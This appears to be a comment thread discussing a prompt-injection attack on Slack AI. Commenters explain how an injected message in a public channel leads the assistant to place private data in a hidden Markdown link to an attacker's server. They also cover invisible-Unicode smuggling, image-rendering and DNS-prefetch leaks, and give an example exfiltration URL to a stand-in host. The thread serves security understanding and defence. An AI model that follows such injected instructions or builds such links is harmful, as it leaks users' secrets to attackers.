![]() |
|
![]() |
| Correct. That's just focused on the zero click scenario of unfurling.
The tricky part with a markdown link (as shown in the Slack AI POC) is that the actual URL is not directly visible in the UI. When rendering a full hyperlink in the UI a similar result can actually be achieved via ASCII Smuggling, where an attacker appends invisible Unicode tag characters to a hyperlink (some demos here: https://embracethered.com/blog/posts/2024/ascii-smuggling-an...) LLM Apps are also often vulnerable to zero-click image rendering and sometimes might also leak data via tool invocation (like browsing). I think the important part is to test LLM applications for these threats before release - it's concerning that so many organizations keep overlooking these novel vulnerabilities when adopting LLMs. |
![]() |
| It gets even worse when platforms blindly render img tags or the equivalent. Then no user interaction is required to exfil - just showing the image in the UI is enough. |
![]() |
| yup, basically showing if you ask AI nicely to |
![]() |
| I don't understand this. So the hacker has to be part of the org in the first place to be able to do anything like that right ??
What is the probability of anything like what is described there to happen and have any significant impact ? I get that LLMs are not reliable (https://www.lycee.ai/blog/ai-reliability-challenge) and using them come with challenges, but this attack seems not that important to me. What am I missing here ?
|
![]() |
| Wouldn't it be better to put "confetti" -- the API key as part of the domain name? That way, the key would be leaked without any required clicks due to the DNS prefetching by the browser. |
![]() |
| How would you own the server if you don't know what the domain is going to be? Perhaps I don't understand.
Edit: Ah, wildcard subdomain? Does that get prefetched in Slack? Pretty terrible if so. |
![]() |
| I didn't find the article to live up to the title, although the idea of "if you social engineer AI, you can phish users" is interesting |
![]() |
| It’s effectively a subtle phishing attack (where a wrong click is game over).
It’s clever, and the probably the tip of the iceberg of the sort of issues we’re in for with these tools. |
![]() |
| Normally, yes, that's just the confused deputy problem. This is an AI-assisted phishing attack.
You, the victim, query the AI for a secret thing. The attacker has posted publicly (in a public channel where he is alone) a prompt-injection attack that has a link to exfiltrate the data. https://evil.guys?secret=my_super_secret_shit The AI helpfully acts on your privileged info and takes the data from your secret channel and combines it with the data from the public channel and creates an innocuous looking message with a link https://evil.guys?secret=THE_ACTUAL_SECRET You, the victim, click the link like a sucker and send evil.guys your secret. Nice one, mate. Shouldn't've clicked the link but you've gone and done it. If the thing can unfurl links that's even more risky but it doesn't look like it does. It does require user-interaction but it doesn't look like it's hard to do. |
![]() |
| Sounds like XSS for LLM chatbots: It's one of those things that maybe doesn't seem impressive (at least technically) but they are pretty effective in the real world |
![]() |
| “Do you have recommendations on more effective alternatives to prevent prompt attacks?”
I wish I did! I’ve been trying to find good options for nearly two years now. My current opinion is that prompt injections remain unsolved, and you should design software under the assumption that anyone who can inject more than a sentence or two of tokens into your prompt can gain total control of what comes back in the response. So the best approach is to limit the blast radius for if something goes wrong: https://simonwillison.net/2023/Dec/20/mitigate-prompt-inject... “No solution will be perfect, but we should strive to a solution that's better than doing nothing.” I disagree with that. We need a perfect solution because this is a security vulnerability, with adversarial attackers trying to exploit it. If we patched SQL injection vulnerability with something that only worked 99% of the time all of our systems would be hacked to pieces! A solution that isn’t perfect will give people a false sense of security, and will result in them designing and deploying systems that are inherently insecure and cannot be fixed. |
![]() |
| > It checks these using an LLM which is instructed to score the user's prompt.
You need to seriously reconsider your approach. Another (especially a generic) LLM is not the answer. |
![]() |
| If you want to defend against prompt injection why would you defend with a tool vulnerable to prompt injection?
I don't know what I would use, but this seems like a bad idea. |
Slack can render Markdown links, where the URL is hidden behind the text of that link.
In this case the attacker tricks Slack AI into showing a user a link that says something like "click here to reauthenticate" - the URL attached to that link goes to the attacker's server, with a query string that includes private information that was visible to Slack AI as part of the context it has access to.
If the user falls for the trick and clicks the link, the data will be exfiltrated to the attacker's server logs.
Here's my attempt at explaining this attack: https://simonwillison.net/2024/Aug/20/data-exfiltration-from...